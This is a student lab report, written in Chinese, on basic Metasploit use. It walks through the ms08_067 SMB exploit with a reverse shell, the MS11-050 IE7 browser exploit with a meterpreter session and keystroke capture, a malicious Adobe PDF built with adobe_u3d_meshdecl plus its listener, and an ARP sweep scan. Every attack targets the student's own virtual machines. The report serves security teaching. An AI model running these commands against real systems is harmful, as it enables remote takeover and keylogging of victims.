20145233《网络对抗》Exp5 MSF基础应用

实验问题思考

什么是exploit,payload,encode

  • exploit是发现了的可以利用的安全漏洞或者配置弱点,这类模块存储着收集到的可利用漏洞和弱点。
  • payload就是在利用漏洞成功后要做的事情,本质上是一段shellcode,通常都是用来获取会话的。
  • encode是编码器,一方面确保之前的payload也就是载荷不出现坏字符影响使用,另一方面尽量掩饰载荷,进行免杀处理。

实验内容

MSF的六种模块

  • Exploit模块

    • 利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
    • 攻击模块
  • Payload模块

    • 渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。
  • Encoder模块

    • 针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
    • 不改变payload的作用,但可以对payload进行加工
  • Aux模块

    • 能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
    • 主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
  • Post模块

    • 支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。
    • 主要指的是攻击之后可能用到的模块
  • Nops模块

    • 对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90。
    • 一些代码返回地址不好确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置

实验过程

我的实验机的IP地址分配(使用的自己手机热点)

  • 一号靶机:172.20.10.6
  • 二号靶机:172.20.10.5
  • kali主机:172.20.10.4

ms08_067渗透攻击

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版,因为中文版的这个漏洞被补丁和谐了,很气,我第一次做到最后没办法完成,只好换了英文版)。

  • 在VMware中设置两台虚拟机网络为桥接模式(还有一个问题,我的kali无法在手机热点中使用nat模式,使用nat无法ping通,我不知道为啥,希望老师解答一下),自动分配IP地址,之后两台虚拟机就可以直接ping通。

MS08_067远程漏洞攻击实践:Shell

  • 在kali终端中开启msfconsole。

  • 输入命令search ms08_067,会显示出找到的渗透模块

  • 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。

  • 输入命令show payload会显示出有效的攻击载荷,我们找到一个shell_reverse_tcp来攻击

  • 命令show targets会显示出可以被攻击的靶机的操作系统型号

  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

  • 输入命令show options显示我们需要在攻击前需要设置的数据

set LHOST kali Ip
set RHOST Win xp Ip
  • 在kali上执行ipconfig/all得到成功的实验结果:

  • 被渗透的完成结果:

IE7浏览器渗透攻击——MS11050安全漏洞

  • 在kali终端中开启msfconsole。

  • 输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。

  • 输入info查看信息

  • 设置对应的载荷set payload windows/meterpreter/reverse_tcp

  • show options查看需要设置的相关信息

  • 设置相关信息地址以及接口(我使用的默认端口4444)

set LHOST kali Ip
set URIPATH XXX

  • kali中显示一个session 1已经创建

  • 输入命令sessions -i 1开始连接

  • 已经攻击成功了,开始按键抓取

Adobe阅读器渗透攻击

adobe_u3d_meshdecl

失败的office

  • 在寻找office找不出漏洞后,寻找到了这个阅读器攻击,适应很广,很好用。

  • 注意kali下要打开显示隐藏文件,不然找不到生成的文件

  • 在kali终端中开启msfconsole。

  • 输入命令use exploit/windows/fileformat/adobe_u3d_meshdecl,进入该漏洞模块的使用。

  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

  • 输入命令show options显示我们需要在攻击前需要设置更改的数据

  • 输入命令来更改

set FILENAME 5233.pdf
set LHOST KALI Ip
set LPORT xxxx

  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

  • 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

  • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接

  • 攻击成功的截图

MSF的扫描

  • 先手动创建一个msf所需的数据库
service postgresql start
msfdb start

  • 这样的好处是搜索起漏洞很快,几乎不需要等待

  • 开启msf

  • 输入命令use auxiliary/scanner/discovery/arp_sweep进入模块

  • show options查看需要设置的消息,其中rhost填写自己电脑所在网段(172.20.10.0)

  • 使用命令,设置这些关键指令

set interface eth0
set RHOSTS 172.20.10.0/21
set threads 2

  • 命令run开启扫描,扫描结果如下:

实验总结

  • 本次实验其实我觉得相比三四次实验来讲其实简单了许多,老师在课上也做了演示,实验的难点我觉得就是自己寻找和其他同学不一样的漏洞来完成实验,在第三部分关于PDF的攻击,我寻找到了一个完美适用的,但是在这之前我都做了几个有关office的漏洞攻击,不是生成的文件损坏,就是无法启动,要不就是没法构成回连,连续寻找了好几个漏洞都没有实现office所以我只好选择了PDF阅读器的另一个漏洞来完成。
  • kali上的metasploit渗透测试工具,真的是一个功能强大内容丰富的工具,可以针对各种漏洞来进行攻击,每一种攻击又有多种载荷,并且通过这次学习还发现很多漏洞已经无法使用,都已经被补丁修复了,所以可以看出来软件公司的更新还是很有用的,我们还是不能忽视了系统的各种更新,一不小心的疏忽可能就导致了很严重的问题。

20145233《网络对抗》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  5. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  6. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  7. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  8. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  9. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  10. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. python开发_python中的module

    在python中,我们可以把一些功能模块化,就有一点类似于java中,把一些功能相关或者相同的代码放到一起,这样我们需要用的时候,就可以直接调用了 这样做的好处: 1,只要写好了一个功能模块,就可以在 ...

  2. LR11中webservice协议的性能测试应用

    使用LR11对webservice协议的接口测试应用 脚本开发步骤:1.打开vuser generator,新建一个脚本,选择webservice协议:2.选择Manage Services(服务管理 ...

  3. VS2015编译VLC2.2.1(under WIN7-64)<转>

    概述: 感谢https://github.com/sunqueen/vlc-2.2.1.32-2013 这个工程,我的工作基本上都是基于它,我只是觉得他的工程设置不够清晰,重新做了一次.区别在于我的工 ...

  4. 【转】arm和x86的区别

    来自: https://blog.csdn.net/u012513972/article/details/78349192/ 信不信,随便逮住一个人问他知不知道CPU,我想他的答案一定会是肯定的,但是 ...

  5. Python 调用阿里云 API 收集 ECS 数据

    #!/usr/bin/env python # coding: utf-8 # author: Wang XiaoQiang ''' 功能介绍: 1.调用阿里云API,收集所有区域 ECS 信息 2. ...

  6. ubuntu18(笔记本) faster-rcnn实例程序运行

    luo@luo-ThinkPad-W540:TensorflowProject$ source activate flappbird (flappbird) luo@luo-ThinkPad-W540 ...

  7. RTX二次开发::检索 COM 类工厂中 CLSID 为 {79210E58-99EB-45D0-8890-763EFEAA143F} 的组件失败,

    解决方法: 1.Interop.RTXSAPILib.dll这个是32位的 将IIS 应用程序池 启用32位应用程序 设置为true就可以了, 2.把编译好的程序选择X86平台运行,就好了 程序员的基 ...

  8. 面向对象的JavaScript-002

    1. <script type="text/javascript"> // Define the Person constructor var Person = fun ...

  9. RTC实时时钟-备份区域BKP--原理讲解

    RTC(Real Time Clock):实时时钟 BCD码:用4位2进制来表示10以内的十进制的形式. RTC的时钟源:LSE(32.768KHZ).HSE_RTC.LSI.经过一个精密校准(RTC ...

  10. git 进阶操作

    1.blame git blame +文件名,可以查看到某个文件每一行最近一次是由谁编辑修改的.-L 22,33 选项可以制定 2.bisect 开始git bisect:   $ git bisec ...